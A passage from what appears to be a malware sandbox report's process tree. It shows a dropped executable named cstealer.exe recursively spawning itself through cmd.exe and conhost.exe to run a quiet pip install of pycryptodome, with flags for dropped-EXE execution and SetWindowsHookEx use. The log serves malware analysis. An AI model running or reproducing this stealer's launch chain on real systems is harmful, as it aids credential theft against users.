        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        51⤵
        Executes dropped EXE
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        52⤵
        Executes dropped EXE
        
        PID:8868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        53⤵
        
        PID:9132
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        54⤵
        Executes dropped EXE
        
        PID:9200
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        55⤵
        Executes dropped EXE
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        56⤵
        
        PID:6304
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:6320
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        57⤵
        Executes dropped EXE
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        58⤵
        Executes dropped EXE
        
        PID:6456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        59⤵
        
        PID:6604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        60⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        60⤵
        Executes dropped EXE
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        61⤵
        Executes dropped EXE
        
        PID:6760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        62⤵
        
        PID:7160
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        63⤵
        Executes dropped EXE
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        64⤵
        Executes dropped EXE
        
        PID:5660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        65⤵
        
        PID:7232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        66⤵
        Executes dropped EXE
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        67⤵
        Executes dropped EXE
        
        PID:7672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        68⤵
        
        PID:7852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        69⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        69⤵
        Executes dropped EXE
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        70⤵
        Executes dropped EXE
        
        PID:8136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        71⤵
        
        PID:5236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        72⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        72⤵
        Executes dropped EXE
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        73⤵
        Executes dropped EXE
        
        PID:5620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        74⤵
        
        PID:5416
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        75⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        75⤵
        Executes dropped EXE
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        76⤵
        Executes dropped EXE
        
        PID:2396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        77⤵
        
        PID:380
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        78⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        78⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        79⤵
        
        PID:8212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        80⤵
        
        PID:5200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        81⤵
        
        PID:8316
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        81⤵
        
        PID:8336
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        82⤵
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        83⤵
        
        PID:3316
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        84⤵
        
        PID:8480
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        85⤵
        
        PID:3068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        86⤵
        
        PID:2060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        87⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        87⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        88⤵
        
        PID:8744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        89⤵
        
        PID:8932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        90⤵
        
        PID:8596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        90⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        91⤵
        
        PID:6084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        92⤵
        
        PID:3712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        93⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        93⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        94⤵
        
        PID:3352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        95⤵
        
        PID:6172
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        96⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        96⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        97⤵
        
        PID:6444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        98⤵
        
        PID:5692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        99⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        99⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        100⤵
        
        PID:7008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        101⤵
        
        PID:6788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        102⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        103⤵
        
        PID:7028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        104⤵
        
        PID:6740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        
        PID:7012
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        105⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        106⤵
        
        PID:7080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        107⤵
        
        PID:5228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        108⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        109⤵
        
        PID:2988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        110⤵
        
        PID:7996
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        111⤵
        
        PID:7968
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        111⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        112⤵
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        113⤵
        
        PID:972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:7840
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        114⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        115⤵
        
        PID:5252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        116⤵
        
        PID:4908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        117⤵
        Suspicious use of SetWindowsHookEx
        
        PID:9468
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        117⤵
        
        PID:9164
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        118⤵
        
        PID:6508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        119⤵
        
        PID:6208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        120⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        121⤵
        
        PID:8948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        122⤵
        
        PID:8040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        123⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        123⤵
        
        PID:9516
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        124⤵
        
        PID:8432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        125⤵
        
        PID:1232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        126⤵
        
        PID:9592
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        126⤵
        
        PID:8720
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        127⤵
        
        PID:9776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        128⤵
        
        PID:9116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        129⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8848
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        129⤵
        
        PID:9048
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        130⤵
        
        PID:4412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        131⤵
        
        PID:10088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        132⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        132⤵
        
        PID:9364
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        133⤵
        
        PID:9588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        134⤵
        
        PID:10072
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        135⤵
        
        PID:9680
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        135⤵
        
        PID:9784
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        136⤵
        
        PID:3800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        137⤵
        
        PID:6068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        138⤵
        
        PID:8836
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        138⤵
        
        PID:7872
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        139⤵
        
        PID:6972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        140⤵
        
        PID:5876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        141⤵
        
        PID:9236
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        141⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        142⤵
        
        PID:5632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        143⤵
        
        PID:3200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        144⤵
        
        PID:9056
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        144⤵
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        145⤵
        
        PID:8428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        146⤵
        
        PID:9616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        147⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        147⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        148⤵
        
        PID:5624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        149⤵
        
        PID:7808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        150⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        150⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        151⤵
        
        PID:9552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        152⤵
        
        PID:9752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        153⤵
        
        PID:9896
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        153⤵
        
        PID:10048
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        154⤵
        
        PID:4628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        155⤵
        
        PID:7848
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        156⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        156⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        157⤵
        
        PID:7372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        158⤵
        
        PID:7212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        159⤵
        
        PID:9412
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        159⤵
        
        PID:7880
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        160⤵
        
        PID:8364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        161⤵
        
        PID:1212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        162⤵
        
        PID:9716
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        162⤵
        
        PID:9272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        163⤵
        
        PID:8756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        164⤵
        
        PID:9324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        165⤵
        Suspicious use of SetWindowsHookEx
        
        PID:9444
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        165⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        166⤵
        
        PID:10112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        167⤵
        
        PID:10228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        168⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        168⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        169⤵
        
        PID:9252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        170⤵
        
        PID:8184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:7172
        
